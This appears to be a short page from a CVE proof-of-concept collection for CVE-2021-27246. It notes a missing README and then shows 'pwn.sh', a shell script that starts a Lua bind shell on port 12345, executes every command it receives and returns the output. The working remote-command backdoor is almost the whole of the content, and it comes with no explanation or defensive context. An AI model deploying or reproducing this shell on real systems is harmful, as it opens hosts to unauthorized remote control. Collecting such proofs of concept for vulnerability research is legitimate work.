4837 Total CVEs
26 Years
GitHub
README.md
README.md not found for CVE-2021-27246. The file may not exist in the repository.
POC / pwn.sh SH
#!/bin/sh
export LPORT=12345
lua -e 'local k=require("socket");
  local s=assert(k.bind("*",os.getenv("LPORT")));
  local c=s:accept();
  while true do
    local r,x=c:receive();local f=assert(io.popen(r,"r"));
    local b=assert(f:read("*a"));c:send(b);
  end;c:close();f:close();'